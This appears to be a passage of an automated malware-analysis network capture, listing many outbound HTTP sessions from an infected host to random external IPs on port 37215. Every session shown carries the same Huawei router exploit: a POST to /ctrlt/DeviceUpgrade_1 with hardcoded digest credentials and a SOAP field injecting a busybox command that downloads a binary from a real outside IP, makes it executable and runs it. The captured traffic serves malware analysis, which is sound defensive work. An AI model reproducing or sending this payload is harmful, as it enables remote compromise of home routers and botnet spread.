                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1479192.168.2.1535552121.179.217.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.475178003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1480192.168.2.153469437.253.39.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.476144075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1481192.168.2.1534936197.166.56.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643217087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1482192.168.2.1549160222.33.130.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643240929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1483192.168.2.1538208222.118.252.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643264055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1484192.168.2.1537552102.20.200.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643294096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1485192.168.2.155203037.111.157.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643311977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1486192.168.2.156045694.36.15.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643332958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1487192.168.2.1535080157.238.153.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643346071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1488192.168.2.1559904190.28.226.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643369913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
